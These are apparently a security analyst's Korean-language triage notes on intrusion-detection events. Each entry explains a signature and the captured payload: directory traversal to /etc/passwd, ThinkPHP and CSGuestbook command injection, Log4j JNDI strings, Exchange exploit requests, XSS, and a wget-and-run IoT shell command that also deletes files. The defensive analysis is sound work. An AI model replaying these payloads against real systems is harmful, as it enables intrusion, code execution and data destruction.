1. 유니코드 해석해보면, 대부분 단순 문자열 오탐인 경우가 많다.
*보안장비 직접 확인결과 다수 Generic XSS evasion - unicode characters 이벤트로 확인되며, 유니코드를 이용한 XSS 필터 우회 공격을 탐지하기 위한 이벤트이나, 정상통신 트래픽으로 확인됨
XSS 공격이 아닌 유니코드로 인한 단순 문자열 일치로 확인되어 오탐인 경우 다수
----------------------------------------------------------------------------------------------------------------------------------------------------------------
정탐(올바르게 탐지된 것 = 실제 공격)
2. WebShell_PHP_POST
PHPCMS 2008의 /type.php에 있는 코드 삽입 취약점으로 인해 공격자는 제어 가능한 파일 이름으로 웹 사이트 캐시 파일에 임의의 콘텐츠를 작성하여 임의 코드를 실행할 수 있습니다. PHP 코드는 템플릿 매개변수를 통해 전송되며 "<?php function" 하위 문자열과 함께 data/cache_template/*.tpl.php 파일에 작성됩니다.
결론 - PHPCMS(웹 사이트를 쉽게 구축할 수 있도록 만든 플랫폼) 2008의 /type.php(템플릿 관련 소스코드들이 포함된 파일)에 있는 취약점을 이용한 공격 시도 탐지
3.결론 : Spring Boot Actuator(Spring boot(자바 기반의 Spring Framework를 사용하여 웹 애플리케이션 개발을 돕는 툴) Application의 정보를 관리 및 제어) 무단 액세스 취약점을 통한 환경 변수 접근 시도(/actuator/env) 탐지 (env endpoint가 필요하여 enable시키고 expose까지 시켜두었다면, 서비스에서 사용 중인 환경 변수를 볼 수 있게 되기 때문에, 의도치 않게 설정해둔 중요 정보가 유출될 수 있습니다. /actuator/env명령과 같이, actuator의 env endpoint를 호출함으로써 서비스에서 사용 중인 환경 변수를 확인할 수 있습니다.
+ 시그니처명 : Grafana.Labs.Grafana.Plugin.Directory.Traversal
탐지 Payload : public/plugins/live/../../../../../../../../etc/profile(로그인 시 시스템 전체 환경(모든 사용자)에 적용되는 환경설정 파일)
Grafana Labs Grafana의 디렉터리 순회 취약점(취약한 URL 경로 : /public/plugins/(plugin_id/)을 이용하여 /etc/profile 접근 시도 탐지
+ 시그니처명 : ECOA.Building.Automation.System.Directory.Traversal
탐지 Payload : fmangersub?cpath=../../../../../../../etc/profile
ECOA.BAS 컨트롤러의 디렉토리 순회를 통해 콘텐츠 노출 취약성을 악용하여 파일관리자(/fmangersub)의 GET 매개 변수 cpath를 활용하여 /etc/profile 접근시도 탐지
+ 탐지 명 : Web.Server.Password.File.Access
탐지 Payload q=../etc/passwd&s=../etc/passwd&search=../etc/passwd&id=../etc/passwd&action=../etc/passwd&keyword=../etc/passwd&query=../etc/passwd&page=../etc/passwd&keywords=../etc/passwd&url=../etc/passwd&view=../etc/passwd&cat=../etc/passwd&name=../etc/passwd&key=../etc/passwd&p=../etc/passwd
이중인코딩된 HTTP 요청을 통해 /etc/passwd(로컬 사용자 목록) 액세스 시도 탐지
+ 탐지 명 : Netscape.Search.NS.Query.Pat.Directory.Traversal
search?NS-query-pat=../../../../../../../../../etc/profile
iPlanet 웹서버 및 Netscape Enterprise Server용 검색엔진의 디렉터리 통과 취약점을 이용한 시스템 파일(/etc/profile)에 접근하려는 시도 탐지
4.ThinkPHP(동적 웹 어플리케이션 개발을 위한 PHP framwork)의 필터 매개변수의 취약점을 이용해 접근하여 invokefunction(함수호출)을 통한 원격 코드 삽입 공격 시도 탐지
페이로드:
/thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array & vars[0]=system&vars[1][] =ls% 20-l
위 코드에서 '\'를 필터링하지 못해 컨트롤러 클래스(app)에 접근하여 invokefunction함수를 호출
이 후 call_user_fuc_array&vars[0] 매개변수에 원격 코드를 삽입하여 시스템을 제어한다.
5.CrossSiteScripting - /error/default.asp?aspxerrorpath=/javascript:movepage('cinderelladeco',1);
웹 페이지에 악성 스크립트를 업로드 전송을 통한 스크립트 삽입 시도 탐지
/error/default.asp 페이지 요청 시 리다이렉트 응답을 이용하여 'cinderelladeco' 페이지 이동 등 비정상적 접근 시도 다수 확인
6.InvalidUri
/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh
Apache HTTP Server(무료 오픈 소스 교차 플랫폼 웹 서버 소프트웨어)을 대상으로 디렉터리 외부 파일에 URL Mapping 시도
%%.%%. 두번쨰. 인식못해 코드 삽입을 통해 정보들을 매핑할 수 있다.
7. HTTP.URI.Script.XSS
HTTP 요청을 통해 XSS 취약점을 이용해 스크립트에 도메인 삽입 시도 탐지
GET /%22%3E%3Cscript%20src="공격자가 설정한 url" HTTP/1.1<
디코딩 -> "><script src="공격자가 설정한 url"></script><cznkrm>{}
HTML 문서를 처리하다가 <script> 엘리먼트를 만나면 src 속성에 명시된 경로의 파일을 내려받아 자바스크립트 코드를 실행. <script?</script>가 스크립 삽입 구문임.
8. AndroxGh0st.Malware
Laravel .env 파일을 대상으로 하는 악성 Python 멀웨어(AndroxGh0st) 업로드 시도 탐지
POST /?0x%5B%5D=androxgh0st HTTP/1.1
9. HTTP.Referer.Header.SQL.Injection
HTTP Referer 헤더 취약점을 통한 SQL 인젝션(SELECT, UNION) 시도 탐지
10. DTI.Callback
GET /admin/elfinder/php/connector.php HTTP/1.1
엘파인더(jQueryUI를 사용한 자바스크립트 기반 웹용 오픈 소스 파일 관리자)취약점을 통해 주요 파일(connector.php)에 접근하려는 시도 탐지
11. Montala.Limited.ResourceSpace.index.php.XSS
GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E
Montala Limited ResourceSpace(오픈 소스 디지털 자산 관리 소프트웨어)의 교차 사이트 스크립팅 취약점을 악용하려는 시도 탐지
12. Exploit.Kit.SocialEng.Malverisement - Exploit = 악성
멀버타이징(Malvertising)은 Malicious(악성)과 Advertising(광고)의 합성어
GET /?subid1\=20230513-1952-204b-bd3f-154f402dc55a HTTP/1.1
PC 및 휴대폰(Wifi)에서 단순 입력실수로 접근된 URL임을 확인
13.(1096)Common BBS File Upload Webshell Vulnerability-24
GET /include/dialog/select_soft_post.php HTTP/1.1
원격 공격자가 인증을 우회하여 관리 액세스 권한을 얻으려는 시도 탐지
14. Backdoor.Meterpreter
GET /G0qt HTTP/1.1
/G0q /W9di 페이지 접근 시도 시 탐지
Meterpreter는 공격자가 대상 컴퓨터를 탐색하고 코드를 실행할 수 있는 대화형 셸을 제공하는 Metasploit 공격
15.Apache.Log4j.Error.Log.Remote.Code.Execution
Apache Log4j의 라이브러리를 이용하여'${jndi:ldap://자바객체 URL}' 형식의 문자열이 포함된 경우
별도의 검증 없이 원격의 자바 객체를 자신의 서버에서 실행시킬 수 있는 원격 코드 실행 취약점을 이용하여
Tableau(서버의 사용자, 워크북, 데이터 연결 및 기타 리소스를 프로그래밍 방식으로 관리할 수 있는 API )의 Vizportal API를 통해 로그인 시도 공격 탐지
16.Zimbra.Collaboration.Server.Directory.Traversal
GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1</URI>
Zimbra Collaboration Server (이메일 서버/웹 클라이언트를 포함한 협업 소프트웨어(groupware)) 디렉터리 통과 취약점 공격 시도 탐지
/res...Ajx TemplateMsg.js.zgz 탐색 취약점을 통한 skin 매개변수를 이용해 /localconfig.xml 등 주요 파일 접근 시도 확인
17. DTI.Callback + iIS's many default bugs
시그니처 검색결과 에러페이지 접근시 Get 요청을 통해 /error/default.asp를 받아오는 것 확인, 많이 탐지되는 경우만 문제 있음
18. CGI.CSGuestbook.Remote.Command.Execution
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/profile')
결 : CGIScript.net(Mike Barone이 개발한 상업용 perl cgi 스크립트 판매 사이트) CSGuestbook(방명록 프로그램)의 csGuestbook.cgi는 구성 데이터를 perl(래리 월이 만든 인터프리터 방식(소스코드를 한 줄 한 줄 읽어가며 명령을 바로 처리)의 프로그래밍 언어)로 저장해, setup 스크립트를 불러올 때 접근 유효성 검사가 제대로 이뤄지지 않아 발생하는 원격 코드 실행 취약점을 악용 / 원격 코드 실행을 통한 etc/profile 접근 시도 탐지
19. WebNMS.Framework.Directory.Traversal
servlets/FetchFile?fileName=../../../../../../../etc/profile
servlets(애플리케이션을 호스트하는 서버의 기능을 확장하는 데 사용되는 Java 프로그래밍 언어 클래스)/FetchFile(파일 업로드 프로그램)에 취약한 매개 변수 fileName을 통해 디렉터리 통과 문자('../')를 사용하여 etc/profile(로그인 시 시스템 전체 환경에 적용되는 환경설정 파일) 접근 시도 탐지
20. PHPUnit.Eval-stdin.PHP.Remote.Code.Execution
POST /mbdlms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?<?php $str="QnVnIEJvdW50eSAtLS0gVnVsbmVyYWJsZSEhCg==";echo(base64_decode($str));?>
PHPUnit? PHP 프로그래밍 언어를 위한 유닛 테스트 프레임워크.
Vendor 폴더란? 패키지가 저장되는 폴더이며 composer를 통해 설치되는 패키지들을 저장
Composer란? PHP의 의존성 관리 도구
21.Webshell.Binary.php.FEC2
POST/php/upload.php HTTP/1.1
/php/upload.php 요청을 통해 PHP 파일 업로드 시도 탐지
22. MS.Exchange.Server.ProxyRequestHandler.Remote.Code.Execution
GET /owa/auth/x.js HTTP/1.1</URI>
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Microsoft Exchange 서버 측으로의 /owa/auth/x.js GET 요청과 쿠키값인 X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3; 을 통해 목적지 서버 측으로 공격 취약 여부 확인을 위한 요청 시도로 분석됨
CVE-2021-26855
CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078
24. MS.Exchange.Server.Autodiscover.Remote.Code.Execution
<URI> GET /autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com HTTP/1.1</URI>
Microsoft Exchange Server(마이크로소프트사가 개발한 메시징, 협업 소프트웨어)의 원격 코드 실행 시도 / 존재하지 않는 메일 주소에 대해 autodiscover 요청을 통한 사용자 권한 탈취 후, 웹쉘 삽입 시도 탐지
25.Citrix.ADC.Gateway.SDWAN.WAN-OP.report.Authentication.Bypass
Citrix ADC 게이트웨이(모든 회사 리소스에 액세스할 수 있는 Micro VPN 경로를 제공) 및 SDWAN(광역통신망) WAN-OP(광역네트워크 최적화)의 인증 우회 취약점을 악용하려는 공격 시도 탐지 / root권한 접근 시도 확인
26.Atlassian.Jira.Server.ViewUserHover.jspa.Information.Disclosure
<URI> HEAD /Keyword/secure/ViewUserHover.jspa?username=hdvhsyoc HTTP/1.1</URI>
<HEADER> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 Edge/18.18362
Atlassian Jira의 정보 공개 취약성을 악용하려는 공격 시도 / 'hdvhsyoc' 라는 사용자 이름 파악 시도 탐지
27. Spring.Security.RegexRequestMatcher.Authentication.Bypass
/admin/;/admin/;GET /admin/%20HTTP/5.1%0d%0aasd:%20aa%0d%0a%0d%0a HTTP
결론 : Spring Security(비즈니스 또는 정부와 같은 회사 환경에서 작동하도록 설계된 대규모 소프트웨어 시스템 플랫폼에 대한 인증, 권한 부여 및 기타 보안 기능을 제공하는 Java/Java EE 프레임워크)의 RegexRequestMatcher 클래스 인증 우회 취약점에 대한 공격 시도 탐지 / /admin/ 이하에 %20같은 일부 특정 문자로 시작할 경우 필터링되지 않는 점을 악용한 공격 시도로 확인됨
28.ThinkPHP.Request.Method.Remote.Code.Execution
<URI> POST //index.php?s=index/index/indexs=FmZU6&method=_construct&method&filter[]=var_dump HTTP/1.1</URI>
<HEADER>
</HEADER>
<BODY> s=FmZU6&method=_construct&method&filter[]=var_dump</BODY>
<PACKET> s=FmZU6&method=_construct&method&filter[]=var_dump</PACKET>
결론 : ThinkPHP(동적 웹 PHP 개발 프레임 워크)의 원격 코드 실행 취약점을 악용하려는 공격 / construct(객체의 속성을 초기화) 메서드, var_dump(저장된 값을 출력) 메서드 실행 여부 확인 시도 탐지
29. Exploit.IoT.Generic (WAF)
탐지 Request : http://sslcert.cc/delete.php
탐지 Payload 내역 :
GET /shell?cd+/tmp;rm+-rf+;wget+94.158.247.123/jaws;sh+/tmp/jaws{*} HTTP/1.1
User-Agent: Hello, world
"cd+/tmp;rm+-rf"명령어를 통해 temp 폴더에 있는 데이터 전체 삭제 후 wget+94.158.247.123/jaws;sh+/tmp/jaws를 이용해 /tmp 디렉토리에 접근해서 악성 스크립트를 심으려는 시도 탐지
30. Unix hidden (dot-file) access,"/.env" access
POST /production/.env HTTP/1.1
결론: 숨겨진 파일 .env(환경 변수 파일) 전송/업데이트 시도 탐지. POST 형식으로 .env 파일에 데이터 "r[]=legion"를 전송/업데이트 하려는 시도로 분석됨
30. Backdoor.Win.Generic(Fireeye NX)
GET / HTTP/1.1
페이로드 내용중,
Sec-Dest: 95Walajt
Sec-Site: 68989687328F8D338105
멀웨어가 설치되어 있을 경우 'Sec-Dest' 및 'Sec-Site' HTTP 섹션에 기재된 공격자에게 전송되는 피해자 컴퓨터 정보의 암호화된 데이터를 전송하여 공격자가 대상 서버 측으로 원격 공격 시도 가능 여부에 대한 요청 시도 탐지
31. Atlassian.Confluence.OGNL.Remote.Code.Execution
Atlassian Confluence(자바 기반의 상용 협업 소프트웨어)의 원격 코드 실행 취약점을 이용하여Runtime.getRuntime().exec 자바 명령 구문을 이용해 ebay.sslgoodsimg.gmarket.co.kr 도메인에서 IP 등의 정보 확인 시도 탐지
32. FEC_Trojan_PHP_Generic_1.FEC2
POST/wp-content/plugins/apikey/apikey.php HTTP/1.1
Wordpress 제품군 관련 wp-content/plugins/apikey/apikey.php(API 호출자를 식별하는 기능)플러그인 취약점을 이용해 a57bze8931.php 파일 업로드 시도 탐지
